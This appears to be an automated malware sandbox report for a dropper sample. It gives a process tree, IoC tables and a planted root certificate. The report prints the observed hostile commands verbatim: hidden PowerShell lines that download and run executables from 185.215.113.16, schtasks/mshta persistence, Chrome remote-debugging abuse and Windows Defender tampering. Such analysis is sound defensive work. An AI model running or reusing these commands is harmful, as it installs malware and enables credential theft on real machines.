Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	lFlj2tl.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	lFlj2tl.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2436	schtasks.exe
2392	schtasks.exe

Suspicious behavior: EnumeratesProcesses 58 IoCs

pid	Process
2520	f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
2716	skotes.exe
2820	KsqTMuf.exe
2820	KsqTMuf.exe
2820	KsqTMuf.exe
2820	KsqTMuf.exe
2996	lFlj2tl.exe
1756	powershell.exe
1756	powershell.exe
1756	powershell.exe
2944	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
2996	lFlj2tl.exe
1700	powershell.exe
872	powershell.exe
2052	powershell.exe
2780	powershell.exe
2944	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
2944	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
2996	lFlj2tl.exe
2164	chrome.exe
2164	chrome.exe
1644	NthMhDa.exe
2780	powershell.exe
2780	powershell.exe
2780	powershell.exe
2056	483d2fa8a0d53818306efeb32d3.exe
2996	lFlj2tl.exe
628	Gxtuum.exe
2912	GKjci28.exe
2912	GKjci28.exe
2912	GKjci28.exe
2912	GKjci28.exe
2912	GKjci28.exe
2996	lFlj2tl.exe
1804	inet.exe
2708	apitlt.exe
2880	728eb8fad7.exe
2652	fefef60740.exe
2000	KsqTMuf.exe
2000	KsqTMuf.exe
2000	KsqTMuf.exe
2000	KsqTMuf.exe
2992	NthMhDa.exe
2276	GKjci28.exe
2276	GKjci28.exe
2276	GKjci28.exe
2276	GKjci28.exe
2276	GKjci28.exe
936	Hdn6gzf.exe
600	Hdn6gzf.exe
600	Hdn6gzf.exe
600	Hdn6gzf.exe
600	Hdn6gzf.exe
600	Hdn6gzf.exe
936	Hdn6gzf.exe
936	Hdn6gzf.exe
936	Hdn6gzf.exe
936	Hdn6gzf.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	872	powershell.exe
Token: SeDebugPrivilege	2052	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	2944	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
Token: SeShutdownPrivilege	2164	chrome.exe
Token: SeShutdownPrivilege	2164	chrome.exe
Token: SeShutdownPrivilege	2164	chrome.exe
Token: SeShutdownPrivilege	2164	chrome.exe
Token: SeShutdownPrivilege	2164	chrome.exe
Token: SeShutdownPrivilege	2164	chrome.exe
Token: SeShutdownPrivilege	2164	chrome.exe
Token: SeShutdownPrivilege	2164	chrome.exe
Token: SeShutdownPrivilege	2164	chrome.exe
Token: SeShutdownPrivilege	2164	chrome.exe
Token: SeShutdownPrivilege	2164	chrome.exe
Token: SeShutdownPrivilege	2164	chrome.exe

Suspicious use of FindShellTrayWindow 39 IoCs

pid	Process
2520	f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
264	dbf56223ab.exe
264	dbf56223ab.exe
264	dbf56223ab.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
2164	chrome.exe
1644	NthMhDa.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
264	dbf56223ab.exe
264	dbf56223ab.exe
264	dbf56223ab.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2520 wrote to memory of 2716	2520	f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe	30
PID 2520 wrote to memory of 2716	2520	f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe	30
PID 2520 wrote to memory of 2716	2520	f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe	30
PID 2520 wrote to memory of 2716	2520	f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe	30
PID 2716 wrote to memory of 2940	2716	skotes.exe	33
PID 2716 wrote to memory of 2940	2716	skotes.exe	33
PID 2716 wrote to memory of 2940	2716	skotes.exe	33
PID 2716 wrote to memory of 2940	2716	skotes.exe	33
PID 2716 wrote to memory of 1740	2716	skotes.exe	34
PID 2716 wrote to memory of 1740	2716	skotes.exe	34
PID 2716 wrote to memory of 1740	2716	skotes.exe	34
PID 2716 wrote to memory of 1740	2716	skotes.exe	34
PID 1740 wrote to memory of 2820	1740	KsqTMuf.exe	36
PID 1740 wrote to memory of 2820	1740	KsqTMuf.exe	36
PID 1740 wrote to memory of 2820	1740	KsqTMuf.exe	36
PID 1740 wrote to memory of 2820	1740	KsqTMuf.exe	36
PID 1740 wrote to memory of 2820	1740	KsqTMuf.exe	36
PID 1740 wrote to memory of 2820	1740	KsqTMuf.exe	36
PID 1740 wrote to memory of 2820	1740	KsqTMuf.exe	36
PID 1740 wrote to memory of 2820	1740	KsqTMuf.exe	36
PID 1740 wrote to memory of 2820	1740	KsqTMuf.exe	36
PID 1740 wrote to memory of 2820	1740	KsqTMuf.exe	36
PID 1740 wrote to memory of 1608	1740	KsqTMuf.exe	37
PID 1740 wrote to memory of 1608	1740	KsqTMuf.exe	37
PID 1740 wrote to memory of 1608	1740	KsqTMuf.exe	37
PID 1740 wrote to memory of 1608	1740	KsqTMuf.exe	37
PID 2716 wrote to memory of 2996	2716	skotes.exe	39
PID 2716 wrote to memory of 2996	2716	skotes.exe	39
PID 2716 wrote to memory of 2996	2716	skotes.exe	39
PID 2716 wrote to memory of 2996	2716	skotes.exe	39
PID 2716 wrote to memory of 264	2716	skotes.exe	41
PID 2716 wrote to memory of 264	2716	skotes.exe	41
PID 2716 wrote to memory of 264	2716	skotes.exe	41
PID 2716 wrote to memory of 264	2716	skotes.exe	41
PID 264 wrote to memory of 3004	264	dbf56223ab.exe	42
PID 264 wrote to memory of 3004	264	dbf56223ab.exe	42
PID 264 wrote to memory of 3004	264	dbf56223ab.exe	42
PID 264 wrote to memory of 3004	264	dbf56223ab.exe	42
PID 264 wrote to memory of 2776	264	dbf56223ab.exe	65
PID 264 wrote to memory of 2776	264	dbf56223ab.exe	65
PID 264 wrote to memory of 2776	264	dbf56223ab.exe	65
PID 264 wrote to memory of 2776	264	dbf56223ab.exe	65
PID 3004 wrote to memory of 2436	3004	cmd.exe	45
PID 3004 wrote to memory of 2436	3004	cmd.exe	45
PID 3004 wrote to memory of 2436	3004	cmd.exe	45
PID 3004 wrote to memory of 2436	3004	cmd.exe	45
PID 2776 wrote to memory of 1756	2776	mshta.exe	46
PID 2776 wrote to memory of 1756	2776	mshta.exe	46
PID 2776 wrote to memory of 1756	2776	mshta.exe	46
PID 2776 wrote to memory of 1756	2776	mshta.exe	46
PID 2716 wrote to memory of 1580	2716	skotes.exe	48
PID 2716 wrote to memory of 1580	2716	skotes.exe	48
PID 2716 wrote to memory of 1580	2716	skotes.exe	48
PID 2716 wrote to memory of 1580	2716	skotes.exe	48
PID 1580 wrote to memory of 2156	1580	cmd.exe	50
PID 1580 wrote to memory of 2156	1580	cmd.exe	50
PID 1580 wrote to memory of 2156	1580	cmd.exe	50
PID 1580 wrote to memory of 2156	1580	cmd.exe	50
PID 2156 wrote to memory of 1044	2156	cmd.exe	52
PID 2156 wrote to memory of 1044	2156	cmd.exe	52
PID 2156 wrote to memory of 1044	2156	cmd.exe	52
PID 2156 wrote to memory of 1044	2156	cmd.exe	52
PID 1756 wrote to memory of 2944	1756	powershell.exe	53
PID 1756 wrote to memory of 2944	1756	powershell.exe	53

C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
"C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2520
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
    "C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"
    3⤵
    - Executes dropped EXE
    PID:2940
- - C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
    "C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1740
  - - C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
      "C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2820
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 68
      4⤵
      Loads dropped DLL
      Program crash
      PID:1608
- - C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
    "C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:2996
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2164
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef70e9758,0x7fef70e9768,0x7fef70e9778
        5⤵
        
        PID:2776
    - - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        5⤵
        
        PID:2708
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:2
        5⤵
        
        PID:1728
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8
        5⤵
        
        PID:1624
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1100 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8
        5⤵
        
        PID:2016
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2360 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1316
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2384 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1292
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1120 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:2
        5⤵
        
        PID:2604
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2276 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1828
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3496 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8
        5⤵
        
        PID:1996
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3616 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8
        5⤵
        
        PID:2288
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3616 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8
        5⤵
        
        PID:2924
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\5phva" & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:2544
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1980
- - C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe
    "C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:264
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn kBltRmaI8Wg /tr "mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3004
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn kBltRmaI8Wg /tr "mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2436
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of WriteProcessMemory
      PID:2776
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1756
      - C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
        
        "C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE"
        6⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2944
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1580
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2156
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1044
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1480
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1700
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1676
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:872
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2148
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2052
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "qhfSJmalPrD" /tr "mshta \"C:\Temp\hWO8LyeS1.hta\"" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2392
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\hWO8LyeS1.hta"
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2532
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2780
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2056
- - C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe
    "C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    PID:1644
  - - C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
      "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:628
    - - C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1804
- - C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe
    "C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2912
- - C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe
    "C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2880
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2264
